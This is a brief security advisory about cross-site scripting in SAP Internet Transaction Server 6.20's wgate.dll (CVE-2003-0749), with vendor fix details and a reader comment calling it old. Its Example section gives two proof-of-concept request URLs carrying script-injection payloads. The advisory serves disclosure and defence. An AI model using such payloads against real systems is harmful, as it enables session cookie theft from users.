|
|
| |
| Insufficient input and output validation in SAP Internet Transaction Server's wgate.dll on miscellaneous userinput-parameters enables insertion of html/client side scripting tags. |
| |
Credit:
The information has been provided by Andrew Davies.
|
| |
Vulnerable Systems:
* SAP ITS version 6.20 (6200.1017.50954.0, Build 730827 (win32/IIS 5.0))
Example:
HTTP-Requests:
http://example.com/scripts/wgate.dll?~service=--><img%09src=javascript:alert(xss);
Or:
http://example.com/scripts/wgate/%22);alert('xss');alert(%22a/!
Impact:
Due to excessive usage of cookies for managing sessions and/or states cookie-theft is very likely.
Vendor Status:
Vendor advised and has stated that the solution and workaround are available through SAP note 1052053.
CVE Information:
CVE-2003-0749
|
|
|
| Subject:
|
very old |
Date: |
10 May 2008 |
| From: |
sapstuffsecurityfocu.somc |
more than old:
http://marc.info/?l=bugtraq&m=106229369712568&w=2
|
|
|
|
|
